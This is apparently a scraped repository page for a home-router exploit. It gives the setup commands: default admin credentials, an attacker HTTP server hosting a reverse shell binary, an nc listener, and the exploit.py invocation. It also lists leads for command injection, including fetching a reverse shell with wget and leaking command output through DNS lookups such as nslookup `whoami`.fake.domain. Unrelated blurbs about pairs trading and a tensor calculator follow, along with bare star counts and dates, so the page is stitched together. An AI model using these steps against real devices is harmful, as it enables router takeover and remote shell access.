# Install the requirements.
pip install -r requirements.txt
ROUTER_HOST=192.169.1.1
ROUTER_USERNAME=admin
ROUTER_PASSWORD=admin
ATTACKER_HOST=192.169.1.100
ATTACKER_HTTP_SERVER_PORT=8000
ATTACKER_REVSHELL_HANDLER_PORT=4141
# Start HTTP server in order to serve the reverse shell executable.cd revshell
python -m SimpleHTTPServer $ATTACKER_HTTP_SERVER_PORT# Start reverse shell handler.
nc -l $ATTACKER_REVSHELL_HANDLER_PORT# Run the exploit.
python exploit.py --host $ROUTER_HOST --username $ROUTER_USERNAME --password $ROUTER_PASSWORD --attacker-host $ATTACKER_HOST --attacker-http-port $ATTACKER_HTTP_SERVER_PORT --attacker-handler-port $ATTACKER_REVSHELL_HANDLER_PORT
Leads for leaking command output
Look for file paths that are displayed within the web interface that command output can be written to. Using /tmp/ping.log to view the output at /Ping.asp.
Use wget to download reverse shell binary to the router.
Config the attacker as the DNS server and force the router to issue DNS requests with the command output. Like nslookup `whoami`.fake.domain
TODOs
Use argparse and make the exploit an executable.
Unsolved Mysteries
If ui_language is stored in nvram (Non-Volatile Memory), how come it fixes itself upon reboot?
A pairs trade is a market neutral trading strategy enabling traders to profit from virtually any market conditions. This strategy is categorized as a statistical arbitrage and convergence trading str
A simple script written using symbolic python that takes as input a desired metric and automatically calculates and outputs the Christoffel Pseudo-Tensor, Riemann Curvature Tensor, Ricci Tensor, Scal
2 Feb 20, 2022
3 Sep 25, 2022
4 Jun 30, 2022
32 Dec 19, 2022
7 Dec 15, 2021
18 Dec 26, 2022
74 Jan 01, 2023
0 Feb 16, 2022
9 Dec 27, 2022
13 Nov 27, 2022
6 Apr 22, 2022
2 Nov 27, 2021
3 Mar 22, 2022
290 Dec 26, 2022
1 Feb 01, 2022
1 Dec 13, 2021
2 Jan 23, 2022
1 Oct 22, 2021
5 Dec 19, 2022
6 Aug 22, 2021